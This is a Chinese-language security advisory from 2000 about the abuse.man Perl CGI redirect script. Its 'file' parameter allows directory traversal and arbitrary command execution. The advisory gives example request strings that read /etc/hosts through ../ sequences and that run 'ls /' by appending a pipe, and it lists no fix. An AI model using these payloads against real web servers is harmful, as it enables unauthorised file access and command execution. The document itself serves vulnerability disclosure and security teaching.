abuse.man CGI漏洞可以执行任意命令
发布日期:2000-03-18
更新日期:2000-03-18
受影响系统:abuse.man (webmanager kit)
描述:
abuse.man是一个perl cgi脚本,用来将client的请求转向指定页面,它也可以很容易地管理
虚拟主机。但是它存在一个有严重安全漏洞,允许远程或者本地用户`在web服务器上执行任意
命令(以httpd运行uid执行),攻击者可能利用这个漏洞获取更高权限.
<* 来源: dethy (deth@synnergy.net)
dvorak (dvorak@synnergy.net)
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
abuse.man用file变量来指定要转向的url地址(使用了绝对路径):
http://server.com/file=/disk1/e/domain/public_html/index.html&
domain=hostname.com&script=/index.html
攻击者可以修改file变量,这样就可以浏览系统文件或者执行任意命令。
例如:
浏览/etc/hosts文件:
Eg: file=/disk1/e/domain/public_html/../../../../../../etc/hosts&
通过增加管道符,可以执行命令,这里列出根目录内容:
Eg: file=/disk1/e/domain/public_html/../../../../../../bin/ls+/|&
建议:
暂无
浏览次数:6327
严重程度:0(网友投票)